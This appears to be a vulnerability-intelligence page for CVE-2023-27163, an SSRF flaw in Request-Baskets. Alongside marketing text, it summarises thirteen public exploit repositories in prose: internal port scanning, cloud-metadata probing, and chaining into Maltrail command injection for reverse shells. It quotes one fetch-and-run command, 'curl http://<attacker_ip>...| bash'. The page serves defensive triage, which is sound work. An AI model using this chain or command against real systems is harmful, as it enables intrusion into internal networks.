CVE-2023-27163 is a server-side request forgery vulnerability in Request-Baskets through version 1.2.1. The /api/baskets/{name} functionality permits a basket to forward requests to an attacker-selected destination. An attacker can craft an API request that causes the Request-Baskets server to access unintended internal, localhost-only, or otherwise network-restricted services.
Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.
What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.
What an attacker gets, and what they’ve been doing with it.
If you can’t patch tonight, do this now.
Patch, then assume compromise.
13 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.
This 10-file repository is a self-contained Docker lab and verification toolkit for CVE-2023-27163 (CWE-918) in Request-Baskets. The primary operational code is scripts/verify_vulnerability.py, a Python requests-based tool that creates a basket through the Request-Baskets API with an arbitrary forward_url and proxy_response enabled, then requests the basket endpoint to relay and display an internal service response. Default parameters target http://localhost:55556 and http://internal-service:5678; both target URL and internal URL are configurable on the command line. It cleans up the created basket using the returned token when available. The vulnerable docker-compose.yml deploys darklynx/request-baskets:v1.2.1 alongside hashicorp/http-echo on the shared lab-net Docker bridge network. Only Request-Baskets is host-published (55556->55555); the echo backend remains Docker-internal on port 5678 and serves a fixed confidential-data marker. This demonstrates that an unauthenticated remote user can configure Request-Baskets to access otherwise non-host-reachable internal services and read their responses. The companion scripts/detect.py is a defensive audit tool: it fingerprints the landing page, submits a temporary loopback forwarding configuration to 127.0.0.1:80, interprets acceptance as vulnerable, and attempts immediate deletion. scripts/capture_evidence_flow.sh orchestrates vulnerable-lab startup, exploitation, detection, and remediated-lab verification for screenshots. The patched Compose topology uses separate public-net and internal:true secure-internal-net networks, leaving Request-Baskets unable to resolve or connect to internal-service. The verification script recognizes forwarding failures such as HTTP 502/504, timeouts, or empty responses as successful network-segmentation remediation. Documentation in README.md, evidence/README.md, and docs/technical_blog.md explains reproduction, detection, and mitigation; docs/generate_blog_pdf.py only renders the technical blog to PDF. This is not a framework module and is a genuine operational lab exploit/verification repository, rather than a detection-only or fake exploit.
Repository contains a single Python exploit script (exploit.py) plus a README. The script is a standalone operational exploit for CVE-2023-27163 in request-baskets <= 1.2.1. It abuses the forward_url parameter in basket configuration to create attacker-controlled baskets that force the vulnerable server to issue HTTP requests to arbitrary destinations. Primary capabilities include: (1) direct SSRF forwarding to arbitrary internal or external URLs, (2) optional proxy-response mode to return the forwarded response body, (3) internal port scanning against operator-supplied hosts, (4) discovery of common localhost/internal services using predefined host templates and common ports, and (5) probing of cloud metadata services for AWS, GCP, Azure, DigitalOcean, and Alibaba. The script also supports basket profile options such as insecure TLS, path expansion, configurable capacity, timeout, and scan delay. The exploit targets web-accessible request-baskets instances and relies on the vulnerable basket creation/update API endpoint /api/baskets/{name}; the README and header comments also note POST /baskets/{name} as a related trigger path. The code appears intended for real use rather than mere detection: it validates target reachability, initializes an exploit engine, performs selected SSRF actions, and manages active baskets. No post-exploitation shell payload is included; the effect is SSRF-based network reachability and information access through the victim server. Overall purpose: turn a vulnerable request-baskets deployment into an SSRF pivot/proxy for internal reconnaissance and metadata access.
Small Python exploit repository containing a single executable script, exploit.py, plus a README and standard Python .gitignore. The script automates a two-stage exploit chain intended for the HTB Sau machine: first it abuses CVE-2023-27163 in Request Baskets by POSTing to /api/baskets/tghost and creating a basket that forwards traffic to http://127.0.0.1:80; then it uses the resulting /tghost basket URL as a pivot to reach an internal Maltrail instance and POST to /login with a command-injection payload. The payload is a base64-encoded Python reverse shell that connects back to an operator-supplied listener IP and port and spawns /bin/sh. The exploit is operational rather than a mere PoC because it includes a working shell payload, but it is not highly flexible beyond user-supplied target and callback parameters. No framework is used; the repository is purpose-built and minimal.
Repository contains a minimal proof-of-concept exploit for CVE-2023-27163 affecting the request-baskets (Request Baskets) service. Structure: (1) README.md with basic CLI usage: `cve-2023-27163-ssrf_baskets.py <target url> <internal url>` and an example; (2) a single Python script `cve-2023-27163-ssrf_baskets.py` implementing the exploit. The script uses Python `requests` to create a new basket by POSTing JSON to the target API endpoint `/api/baskets/{basket_name}` where `basket_name` is a random 6-letter string. The JSON config sets `forward_url` to the attacker-supplied internal URL, enables `proxy_response` (so the proxied response is returned), and sets `expand_path` to true (so paths requested on the basket are appended/expanded when forwarding). On HTTP 201 it reports success and indicates that requests to `{target}/{basket_name}` will be redirected/forwarded to the internal URL, providing an SSRF primitive that can be used to reach internal services accessible from the vulnerable server.
Repository contains a single Python exploit script and a README. The script (cve-2023-27163-maltrail.py) targets CVE-2023-27163 in Maltrail 0.53 by sending an HTTP POST request to the target’s /login endpoint with a crafted application/x-www-form-urlencoded body. The username parameter is injected with a backtick-delimited shell command that echoes a base64-encoded payload, decodes it, and pipes it to sh. The decoded payload is a python3 reverse shell one-liner that connects to the supplied LHOST and LPORT, duplicates file descriptors, and spawns /bin/bash via pty for an interactive shell. Usage is via CLI arguments: <target url> <lhost> <lport>. No scanning/detection logic, persistence, or post-exploitation modules are included—this is a direct RCE-to-reverse-shell PoC/operational exploit.
Repository contains a Python exploit (exploit.py) and a sample reverse-shell script (shell.sh) targeting CVE-2023-27163 in request-baskets <= 1.2.1. The exploit first creates a basket via POST /api/baskets/{name} with JSON configuration that sets forward_url to http://127.0.0.1 and enables proxy_response/expand_path, establishing an SSRF/proxy primitive into localhost. It then attempts to trigger RCE by POSTing form data to http://<target>:<port>/<basket>/login with an Authorization: Bearer <token> header, injecting a command in the username field that executes `curl http://<attacker_ip>:<attacker_port>/<payload_file> | bash`. The included shell.sh is a basic bash TCP reverse shell (hardcoded to 10.10.14.60:4444) intended to be served over HTTP and executed on the target. Overall purpose: chain SSRF in request-baskets with an assumed command-injection/RCE in an internal service reachable on 127.0.0.1 to obtain a reverse shell (tested per README on HTB 'Sau').
This repository contains a Bash script exploit for CVE-2023-27163, a Server-Side Request Forgery (SSRF) vulnerability in Request-Baskets versions <= 1.2.1. The exploit automates the creation of a new basket on a vulnerable Request-Baskets server, setting the 'forward_url' parameter to an attacker-controlled URL. This causes the server to forward requests to the attacker's server, allowing the attacker to access internal resources or exfiltrate data via SSRF. The repository consists of four files: the main exploit script (CVE-2023-27163.sh), a README with usage instructions and background, a LICENSE, and a .gitattributes file. The exploit requires the attacker to provide the target server's URL and the attacker's own URL for forwarding. The script uses curl to interact with the vulnerable API endpoint '/api/baskets/{name}'. No detection or fake code is present; the script is a functional proof-of-concept exploit.
This repository provides a proof-of-concept exploit for CVE-2023-27163, a server-side request forgery (SSRF) vulnerability in Request-Baskets. The main script, CVE-2023-27163.py, is a Python 3 tool that automates the exploitation process. It creates a new basket on the vulnerable Request-Baskets instance, configures the basket to forward requests to internal addresses (127.0.0.1) on a range of ports (provided via a ports file), and triggers requests to determine which ports are open. The results are written to an output file. The repository includes three large text files listing common ports (top-ports-1000.txt, top-ports-5000.txt, top-ports-10000.txt) for use in scanning. The README.md provides usage instructions and context about the vulnerability. The exploit is a network-based SSRF port scanner targeting internal services accessible from the vulnerable application.
This repository contains a Python proof-of-concept exploit for CVE-2023-27163, a Server-Side Request Forgery (SSRF) vulnerability in Request Basket. The main file, PoC_27163.py, automates the exploitation process by creating a random basket on the vulnerable server, retrieving an API token, and configuring the basket to forward requests to internal services on 127.0.0.1 across a range of ports. The script then attempts to access these internal services, printing the response if a service is found. The README provides detailed usage instructions and configuration options, such as changing the target server and port range. The exploit demonstrates the ability to scan and interact with internal services on the vulnerable server via SSRF, but does not provide a weaponized or post-exploitation payload. The repository is structured simply, with a single exploit script, a README, and a license file.
This repository contains a single Python exploit script (exploit.py) designed to exploit a web application's SSRF (Server-Side Request Forgery) and command injection vulnerabilities. The script requires three arguments: the target URL, the attacker's listener IP, and the listener port. It first triggers an SSRF by sending a POST request to the /api/baskets/pwned endpoint, attempting to make the target server connect to 127.0.0.1:80. After a short delay, it sends a reverse shell payload to the /pwned/login endpoint by encoding a Python reverse shell command in base64 and executing it via a crafted curl command. If successful, this provides the attacker with a shell on the target system. The script is operational and provides a working reverse shell payload, but it is not part of a larger framework. The main attack vectors are network-based, targeting HTTP endpoints. The repository is straightforward, containing only the exploit script.
This repository contains a Python proof-of-concept exploit for CVE-2023-27163, a Server-Side Request Forgery (SSRF) vulnerability in Request-Baskets versions <= 1.2.1. The main file, CVE-2023-27163.py, takes a vulnerable Request-Baskets base URL, a target URL (which can be an internal service), and a wordlist file. For each entry in the wordlist, it crafts a basket with a forward_url pointing to the target plus the fuzzed path, then triggers a request via the vulnerable server. If the target responds with HTTP 200, the response content is printed. The exploit demonstrates the ability to access internal resources or services from the perspective of the vulnerable server, confirming the SSRF vulnerability. The repository is structured simply, with a single exploit script and a README providing usage instructions.
This repository provides a Bash proof-of-concept exploit for CVE-2023-27163, a Server-Side Request Forgery (SSRF) vulnerability in Request-Baskets versions up to 1.2.1. The main exploit script, CVE-2023-27163.sh, takes two arguments: the base URL of a vulnerable Request-Baskets server and a target URL (which can be an attacker-controlled server or an internal service). The script creates a new basket via the /api/baskets/{name} endpoint, setting the 'forward_url' to the attacker-supplied target. This causes the vulnerable server to act as a proxy, forwarding requests to arbitrary destinations, including internal-only services. The repository includes a detailed README with usage instructions, a local testing guide using Docker, and example endpoints. The exploit is a functional proof-of-concept and does not include weaponized payloads or automation beyond basket creation and token extraction.
This repository provides a Proof-of-Concept (PoC) exploit for CVE-2023-27163, a Server-Side Request Forgery (SSRF) vulnerability in Request-Baskets versions up to 1.2.1. The main exploit is a Bash script (CVE-2023-27163.sh) that automates the process of creating a new 'basket' on a vulnerable Request-Baskets server via its /api/baskets/{name} API endpoint. By specifying a 'forward_url' in the basket configuration, the attacker can make the server proxy requests to arbitrary internal or external URLs, thus exploiting SSRF. The repository includes a README with detailed usage instructions, example commands, and a local testing scenario using Docker. No detection scripts or fake exploits are present; the code is a functional PoC. The only code file is the Bash script, which is the entry point for the exploit.
Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.
Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
6 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Query your assets running an affected version, and investigate the blast radius.
Every observed campaign linking this CVE to a named adversary.
Malware families riding this exploit, with evidence and IOCs.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Cross-references every affected SKU, including bundled OEM variants.
Community discussion across Reddit, Mastodon, and other social sources.